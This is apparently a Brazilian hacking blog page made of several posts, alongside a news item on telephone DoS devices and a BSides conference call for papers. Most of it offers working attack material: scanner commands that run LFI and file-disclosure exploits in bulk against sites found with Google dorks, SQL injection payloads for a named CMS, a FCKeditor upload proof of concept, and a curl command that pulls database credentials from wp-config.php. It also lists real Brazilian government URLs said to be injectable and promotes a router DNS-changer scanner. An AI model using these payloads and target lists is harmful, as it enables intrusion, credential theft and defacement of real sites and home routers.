Delicious LinkedIn Facebook Twitter RSS Feed

TOOL DORKING SCANNER INURLBR 1.0

TOOL DORKING SCANNER INURLBR 1.0:https://github.com/googleinurl/SCANNER-INURLBR
TOOL lfiINURL:
https://github.com/googleinurl/lfiINURL
COMMAND EX:
------------------------------------------------------
inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'include=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
------------------------------------------------------
USE linux..



(0DAY) WebDepo - SQL injection

EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL

Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepoo mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.

AUTOR:       Cleiton Pinheiro / Nick: GoogleINURL
Blog:             http://blog.inurl.com.br
Twitter:         https://twitter.com/googleinurl
Fanpage:       https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:              https://github.com/googleinurl
PSS:              http://packetstormsecurity.com/user/googleinurl
YOUTUBE:  http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil



VENTOR:         http://www.webdepot.co.il
GET VULN:     wood=(id) / $wood=intval($_REQUEST['wood'])
  -----------------------------------------------------------------------------

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:     +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
  -----------------------------------------------------------------------------

http://target.us/text.asp?wood=(id)+Exploit

GOOGLE DORK:   inurl:"text.asp?wood="
GOOGLE DORK:   site:il inurl:"text.asp?wood="
GOOGLE DORK:   site:com inurl:"text.asp?wood="   

Exploit: Clique Aqui

Execute exploit:
--help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php WebDepoxpl.php -t target
  php WebDepoxpl.php -f targets.txt
  php WebDepoxpl.php -t target -p 'http://localhost:9090'

EXPLOIT MASS USE SCANNER INURLBR

COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"








A segunda falha:

Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk  
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp


POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/brow­ser/default/browser.html?Connector=conne­ctors/asp/connector.asp

[2] - http://target.us/userfiles/file/{YOU_FILE}


Hackers criam ferramenta que faz ataques DDoS em linhas telefônicas !!








Não são só os sites e serviços da internet que estão sujeitos aos conhecidos ataques de negação de serviço – telefones comuns, sejam eles celulares ou não, também estão sujeitos a sofrerem golpes desse tipo. É o que revelou o site The Register que, nesta segunda-feira (23), trouxe a história do TNT Instant Up, um aparelho criado por hackers do leste da Europa voltado justamente para esse fim.

Vendido na internet por valores que variam entre US$ 500 e US$ 1.200, o equipamento utiliza um sistema interligado de modems e cartões SIM para bombardear um ou mais números com ligações. As chamadas são vazias e servem apenas para congestionar as linhas, impedindo que usuários legítimos consigam acessá-las.

A ideia, aqui, é basicamente a mesma de qualquer ataque DDoS: impedir o uso de serviços. Só que, aqui, eles não são retirados do ar, mas sim acabam apenas congestionados e inutilizáveis enquanto durarem os ataques. A prática está sendo chamada de TDoS, sigla em inglês para Telephone Denial of Service, ou negação de serviço telefônico.

O problema é que, na nova modalidade, os resultados seriam muito mais perigosos. Enquanto a maioria dos golpes desse tipo causam perdas financeiras para as empresas afetadas e inconveniência para seus usuários, o TDoS seria capaz de, por exemplo, bloquear serviços de emergência.



Além disso, o TNT Instant Up seria simples o suficiente para que literalmente qualquer pessoa conseguisse utilizá-lo. Em um vídeo demonstrativo disponível livremente no YouTube, um dos vendedores da ferramenta a exibe em funcionamento com vários celulares ao mesmo tempo, com números que são inseridos a partir de um software rodando em um computador. A negociação com o “comerciante” acontece pelo ICQ ou e-mail e o produto é enviado pelo correio como qualquer eletrônico convencional.

O FBI já teria identificado pelo menos duas circunstâncias em que um dispositivo como o TNT Instant Up foi utilizado para impedir o acesso de usuários a serviços de plano de saúde ou linhas de emergência. Apesar disso, não identificou crimes que estariam sendo realizados em relação ao ataque e que justificariam o bloqueio da linha e a tentativa de impedir que cidadãos contatem a polícia, por exemplo.

De acordo com as informações da IntelCrawler, uma fornecedora de sistemas e soluções de segurança, assim como nos ataques de negação de serviço na web, não existem maneiras de se proteger contra essa nova modalidade de golpe, a não ser, claro, desconectar a linha para que o aparelho pare de tocar sem parar. Uma alternativa que simplesmente não existe para serviços de emergência, principalmente, que agora se tornam alvo de mais uma ferramenta que pode ser usada por qualquer pessoa, seja qual for a intenção dela.







Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP

Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05




Sites .Gov Vulnerável SQLi

[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR Video Aqui

[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution Video Aqui

[TUTORIAL] - Getting access to the Wordpress panel  Video Aqui




0x06 - SCANNER RouterhuntertBR 1.0

Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas sem autenticação dentro do roteador, Assim modificando o DNS padrão dentro do roteador.
O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunterBR.

Explora:
  • 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit 
  • 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit 
  • 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit


Feito em PHP faz varreduras em faixas de ips pré-definidas ou alearias com números limites, até mesmo usando um arquivo fonte como referencias de ip.

- SET PROXY.
- USER AGENT RANDÔMICO.
- SAVE OUTPUT FILE.
[DOWNLOAD]